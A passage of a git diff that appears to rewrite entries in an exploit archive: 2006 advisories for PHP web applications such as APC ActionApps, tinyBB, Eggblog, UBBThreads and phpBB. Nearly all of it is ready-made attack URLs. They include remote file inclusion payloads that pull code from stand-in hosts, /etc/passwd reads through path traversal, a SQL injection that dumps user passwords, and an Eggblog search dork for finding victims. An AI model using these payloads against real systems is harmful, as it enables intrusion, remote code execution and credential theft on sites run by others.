-http://www.site.com/[APC_path]/discussion.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/filldisc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/filler.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/fillform.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/go.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-http://www.site.com/[APC_path]/hiercons.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/jsview.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/live_checkbox.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/offline.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/post2shtml.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/search.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/slice.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/sql_update.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/view.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-
-/*
-In Admin/ folder all files have:
-
-require_once "include/config.php3";
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-include/config.php3: on line 79
-
-require_once $GLOBALS['AA_INC_PATH']."mgettext.php3";
-
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-only this file: logout.php3, prev_navigation.php3, preview.php3, dont
-have this verbilities
-
-All can expl:
-
-
-http://www.site.com/[APC_path]/admin/[any_file]?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-
-*/
-in includes/ folder:
-
-
-http://www.site.com/[APC_path]/include/auth.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/constants.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/csn_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/discussion.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/event.class.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/event_handler.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/extauth.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/extauthnobody.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/feeding.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/fileman.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/formutil.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/item.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/item_content.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/itemfunc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/itemview.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/javascript.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/mail.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/mailman.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/menu.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/notify.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/pagecache.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/perm_sql.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/profile.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/searchbar.class.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/searchlib.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/slicedit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/sliceobj.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/slicewiz.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/stringexpand.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/tabledit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/tabledit_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/tv_email.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/tv_misc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/um_uedit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/um_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/view.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/xml_fetch.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/xml_rssparse.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/include/zids.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-
-/*
-and more verbs in modules/ folder :)
-*/
-
-###################################################################
-#Elo ;-)
-
-# milw0rm.com [2006-05-25]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#APC ActionApps CMS (2.8.1) - Remote File Include Vulnerabilities
+#Find by Kacper (Rahim).
+#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
+#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+#site: http://sourceforge.net/projects/apc-aa/
+##################################################################
+/*
+cached.php3:
+... (line:35)
+require_once $GLOBALS['AA_INC_PATH']."locsess.php3";
+...
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+cron.php3:
+... (line:47)
+require_once $GLOBALS['AA_INC_PATH']."locsess.php3";
+...
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+discussion.php3:
+... (line:80)
+require_once $GLOBALS['AA_INC_PATH']."easy_scroller.php3";
+...
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+filldisc.php3:
+... (line:75)
+require_once $GLOBALS['AA_INC_PATH']."locsess.php3";
+...
+
+And more.......... ;-)
+
+*/
+
+expl:
+
+http://www.site.com/[APC_path]/cached.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/cron.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/discussion.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/filldisc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/filler.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/fillform.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/go.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+http://www.site.com/[APC_path]/hiercons.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/jsview.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/live_checkbox.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/offline.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/post2shtml.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/search.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/slice.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/sql_update.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/view.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+
+/*
+In Admin/ folder all files have:
+
+require_once "include/config.php3";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include/config.php3: on line 79
+
+require_once $GLOBALS['AA_INC_PATH']."mgettext.php3";
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+only this file: logout.php3, prev_navigation.php3, preview.php3, dont
+have this verbilities
+
+All can expl:
+
+
+http://www.site.com/[APC_path]/admin/[any_file]?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+
+*/
+in includes/ folder:
+
+
+http://www.site.com/[APC_path]/include/auth.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/constants.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/csn_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/discussion.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/event.class.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/event_handler.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/extauth.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/extauthnobody.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/feeding.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/fileman.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/formutil.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/item.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/item_content.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/itemfunc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/itemview.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/javascript.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/mail.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/mailman.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/menu.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/notify.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/pagecache.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/perm_sql.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/profile.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/searchbar.class.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/searchlib.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/slicedit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/sliceobj.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/slicewiz.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/stringexpand.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/tabledit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/tabledit_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/tv_email.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/tv_misc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/um_uedit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/um_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/view.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/xml_fetch.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/xml_rssparse.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+http://www.site.com/[APC_path]/include/zids.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
+
+
+/*
+and more verbs in modules/ folder :)
+*/
+
+###################################################################
+#Elo ;-)
+
+# milw0rm.com [2006-05-25]
diff --git a/platforms/php/webapps/1832.txt b/platforms/php/webapps/1832.txt
index 67b2915b0..c161070a3 100755
--- a/platforms/php/webapps/1832.txt
+++ b/platforms/php/webapps/1832.txt
@@ -1,15 +1,15 @@
-Vendor: Plume CMS http://plume-cms.net
-Vuln: Remote File Include
-Discovered: beford <xbefordx gmail com>
-
-Vulnerable File/Code
-
-./plume-1.0.3/manager/frontinc/prepend.php
-
-[code]
-include_once $_PX_config['manager_path'].'/conf/config.php';
-[/code]
-
-http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_path]=http://leet
-
-# milw0rm.com [2006-05-26]
+Vendor: Plume CMS http://plume-cms.net
+Vuln: Remote File Include
+Discovered: beford <xbefordx gmail com>
+
+Vulnerable File/Code
+
+./plume-1.0.3/manager/frontinc/prepend.php
+
+[code]
+include_once $_PX_config['manager_path'].'/conf/config.php';
+[/code]
+
+http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_path]=http://leet
+
+# milw0rm.com [2006-05-26]
diff --git a/platforms/php/webapps/1835.txt b/platforms/php/webapps/1835.txt
index 4b46d1e53..a9551fbd1 100755
--- a/platforms/php/webapps/1835.txt
+++ b/platforms/php/webapps/1835.txt
@@ -1,24 +1,24 @@
-################# DEVIL TEAM THE BEST POLISH TEAM ##################
-#
-#   HOT [(Hot Open Tickets) (hot_11012004_ver2f)] - Remote File Include Vulnerabilities
-#   Find by Kacper (Rahim).
-#   Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
-#   Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-#   Site scripts: http://hotopentickets.sourceforge.net
-#
-####################################################################
-*/ lib_action_step.php: Line(1-4)
-
-   include ($GLOBALS["CLASS_PATH"]."/User_list_class.php");
-   function print_action_list($a)
-   {
-
-/*
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-Expl:
-
-http://www.site.com/[hot_path]/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=[evil_scripts]
-
-#Elo ;-)
-
-# milw0rm.com [2006-05-27]
+################# DEVIL TEAM THE BEST POLISH TEAM ##################
+#
+#   HOT [(Hot Open Tickets) (hot_11012004_ver2f)] - Remote File Include Vulnerabilities
+#   Find by Kacper (Rahim).
+#   Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
+#   Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+#   Site scripts: http://hotopentickets.sourceforge.net
+#
+####################################################################
+*/ lib_action_step.php: Line(1-4)
+
+   include ($GLOBALS["CLASS_PATH"]."/User_list_class.php");
+   function print_action_list($a)
+   {
+
+/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Expl:
+
+http://www.site.com/[hot_path]/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=[evil_scripts]
+
+#Elo ;-)
+
+# milw0rm.com [2006-05-27]
diff --git a/platforms/php/webapps/1839.txt b/platforms/php/webapps/1839.txt
index 13fc11c12..bc54bc901 100755
--- a/platforms/php/webapps/1839.txt
+++ b/platforms/php/webapps/1839.txt
@@ -1,12 +1,12 @@
-tinyBB <= 0.3 Multiple Remote Vulnerabilities
-Method found by nukedx,
-Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
-This exploits works on tinyBB <= 0.3
-Original advisory can be found at: http://www.nukedx.com/?viewdoc=33
-http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
-http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00
-SQL injection on login.php
-http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing
-# nukedx.com [2006-05-27]
-
-# milw0rm.com [2006-05-28]
+tinyBB <= 0.3 Multiple Remote Vulnerabilities
+Method found by nukedx,
+Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
+This exploits works on tinyBB <= 0.3
+Original advisory can be found at: http://www.nukedx.com/?viewdoc=33
+http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
+http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00
+SQL injection on login.php
+http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing
+# nukedx.com [2006-05-27]
+
+# milw0rm.com [2006-05-28]
diff --git a/platforms/php/webapps/1841.txt b/platforms/php/webapps/1841.txt
index ce16b2a3e..250eb9053 100755
--- a/platforms/php/webapps/1841.txt
+++ b/platforms/php/webapps/1841.txt
@@ -1,28 +1,28 @@
-F@cile Interactive Web <= 0.8x Multiple Remote Vulnerabilities
-Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
-This exploits works on F@cile Interactive Web <= 0.8x 
-Original advisory can be found at: http://www.nukedx.com/?viewdoc=35
-File Inclusion Vulnerabilities.
-http://[victim]/[FacilePath]/p-popupgallery.php?l=http://yourhost.com/cmd.txt?
-http://[victim]/[FacilePath]/p-popupgallery.php?l=/etc/passwd%00
-http://[victim]/[FacilePath]/p-editbox.php?pathfile=/etc/passwd
-http://[victim]/[FacilePath]/p-editbox.php?pathfile=\\192.168.1.1\file.php <- php5
-http://[victim]/[FacilePath]/p-editpage.php?pathfile=/etc/passwd
-http://[victim]/[FacilePath]/p-editpage.php?pathfile=\\192.168.1.1\file.php <- php5
-http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=/etc/passwd%00
-http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=/etc/passwd%00
-http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=/etc/passwd%00
-http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=/etc/passwd%00
-http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=/etc/passwd%00
-Cross Site Scripting.
-http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=XSS&myskin=XSS
-http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=XSS&myskin=XSS
-http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=XSS&myskin=XSS
-http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=XSS&myskin=XSS
-http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=XSS&myskin=XSS
-Information disclosure
-http://[victim]/[FacilePath]/index.php?mn=0&pg=0&lang=/etc/passwd%00
-
-# nukedx.com [2006-05-27]
-
-# milw0rm.com [2006-05-28]
+F@cile Interactive Web <= 0.8x Multiple Remote Vulnerabilities
+Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
+This exploits works on F@cile Interactive Web <= 0.8x 
+Original advisory can be found at: http://www.nukedx.com/?viewdoc=35
+File Inclusion Vulnerabilities.
+http://[victim]/[FacilePath]/p-popupgallery.php?l=http://yourhost.com/cmd.txt?
+http://[victim]/[FacilePath]/p-popupgallery.php?l=/etc/passwd%00
+http://[victim]/[FacilePath]/p-editbox.php?pathfile=/etc/passwd
+http://[victim]/[FacilePath]/p-editbox.php?pathfile=\\192.168.1.1\file.php <- php5
+http://[victim]/[FacilePath]/p-editpage.php?pathfile=/etc/passwd
+http://[victim]/[FacilePath]/p-editpage.php?pathfile=\\192.168.1.1\file.php <- php5
+http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=/etc/passwd%00
+http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=/etc/passwd%00
+http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=/etc/passwd%00
+http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=/etc/passwd%00
+http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=/etc/passwd%00
+Cross Site Scripting.
+http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=XSS&myskin=XSS
+http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=XSS&myskin=XSS
+http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=XSS&myskin=XSS
+http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=XSS&myskin=XSS
+http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=XSS&myskin=XSS
+Information disclosure
+http://[victim]/[FacilePath]/index.php?mn=0&pg=0&lang=/etc/passwd%00
+
+# nukedx.com [2006-05-27]
+
+# milw0rm.com [2006-05-28]
diff --git a/platforms/php/webapps/1842.htm b/platforms/php/webapps/1842.htm
index 45475e3a2..4f3be2cbc 100755
--- a/platforms/php/webapps/1842.htm
+++ b/platforms/php/webapps/1842.htm
@@ -1,61 +1,61 @@
-<!--
-Eggblog <= 3.x Multiple Remote Vulnerabilities
-Discovered by: nukedx
-Contacts: ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: http://www.nukedx.com
-Original advisory can be found at: http://www.nukedx.com/?viewdoc=36
-Eggblog <= 3.0.6 (rss/posts.php id) Remote SQL injection
-Example ->  http://[site]/[EggBlog]/rss/posts.php?id=1'/**/UNION/**/SELECT/**/0,concat('Username:%20',username),concat('Password:%20',password)/**/from/**/eggblog_members/*
-This SQL injection will list you all users and passwords.
--->
-
-<html>
-<title>Eggblog 2.x Remote Privilege Escalation
-
-
-
-
-
-
    -
    
-Welcome to Eggblog 2.x Remote Privilege Escalation
-This exploit has been coded by nukedx
-You can found original advisory on http://www.nukedx.com/?viewdoc=36
-Dork for this exploit: inurl:"powered by eggblog"
-Your target must be like that: www.victim.com/Path/
-The sites you found with given dork has like: www.victim.com/eggblog/home/ or www.victim.com/home/
-If the site has /eggblog/home in link your target must be www.victim.com/eggblog/
-For second example your target must be www.victim.com/
-You can login with your admin account via www.victim.com/eggblog/admin/index.php
-Have phun
-
    
-Target -> 
-
-
-
-
-
-
    
-
    
-    
-    
-
-
-
-# milw0rm.com [2006-05-28]
+
+
+
+Eggblog 2.x Remote Privilege Escalation
+
+
+
+
+
+
    +
    
+Welcome to Eggblog 2.x Remote Privilege Escalation
+This exploit has been coded by nukedx
+You can found original advisory on http://www.nukedx.com/?viewdoc=36
+Dork for this exploit: inurl:"powered by eggblog"
+Your target must be like that: www.victim.com/Path/
+The sites you found with given dork has like: www.victim.com/eggblog/home/ or www.victim.com/home/
+If the site has /eggblog/home in link your target must be www.victim.com/eggblog/
+For second example your target must be www.victim.com/
+You can login with your admin account via www.victim.com/eggblog/admin/index.php
+Have phun
+
    
+Target -> 
+
+
+
+
+
+
    
+
    
+    
+    
+
+
+
+# milw0rm.com [2006-05-28]
diff --git a/platforms/php/webapps/1843.txt b/platforms/php/webapps/1843.txt
index f46866d5b..80b3e2d5a 100755
--- a/platforms/php/webapps/1843.txt
+++ b/platforms/php/webapps/1843.txt
@@ -1,22 +1,22 @@
-UBBThreads 5.x,6.x Multiple File Inclusion Vulnerabilities
-Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
-This exploits works on UBBThreads 5.x,6.x
-Original advisory can be found at: http://www.nukedx.com/?viewdoc=40
-Succesful exploitation register_globals on
-Version 6.x
-GET -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=[FILE]
-EXAMPLE -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=../../../../../etc/passwd%00
-GET -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=[FILE]
-EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=http://yoursite.com/cmd.txt?
-EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00
-If php version < 4.1.0 or UBB version <= 5.x
-GET -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=[FILE]
-EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=http://yoursite.com/cmd.txt?
-EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=/etc/passwd%00
-XSS:
-GET -> http://[site]/[ubbpath]/index.php?debug=[XSS]
-EXAMPLE -> http://[site]/[ubbpath]/index.php?debug=
-
-# nukedx.com [2006-05-27]
-
-# milw0rm.com [2006-05-28]
+UBBThreads 5.x,6.x Multiple File Inclusion Vulnerabilities
+Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
+This exploits works on UBBThreads 5.x,6.x
+Original advisory can be found at: http://www.nukedx.com/?viewdoc=40
+Succesful exploitation register_globals on
+Version 6.x
+GET -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=[FILE]
+EXAMPLE -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=../../../../../etc/passwd%00
+GET -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=[FILE]
+EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=http://yoursite.com/cmd.txt?
+EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00
+If php version < 4.1.0 or UBB version <= 5.x
+GET -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=[FILE]
+EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=http://yoursite.com/cmd.txt?
+EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=/etc/passwd%00
+XSS:
+GET -> http://[site]/[ubbpath]/index.php?debug=[XSS]
+EXAMPLE -> http://[site]/[ubbpath]/index.php?debug=
+
+# nukedx.com [2006-05-27]
+
+# milw0rm.com [2006-05-28]
diff --git a/platforms/php/webapps/1844.txt b/platforms/php/webapps/1844.txt
index 1a0f542ed..a62a3e76f 100755
--- a/platforms/php/webapps/1844.txt
+++ b/platforms/php/webapps/1844.txt
@@ -1,15 +1,15 @@
-phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability
-Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
-This exploits works on phpBB 2.x (Activity MOD Plus)
-Original advisory can be found at: http://www.nukedx.com/?viewdoc=38
-
-Succesful exploitation needs register_globals on
-GET -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=[FILE]
-EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=/etc/passwd%00
-Requires magic_quotes_gpc off
-EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt
-Requires allow_url_fopen on
-
-# nukedx.com [2006-05-27]
-
-# milw0rm.com [2006-05-28]
+phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability
+Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
+This exploits works on phpBB 2.x (Activity MOD Plus)
+Original advisory can be found at: http://www.nukedx.com/?viewdoc=38
+
+Succesful exploitation needs register_globals on
+GET -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=[FILE]
+EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=/etc/passwd%00
+Requires magic_quotes_gpc off
+EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt
+Requires allow_url_fopen on
+
+# nukedx.com [2006-05-27]
+
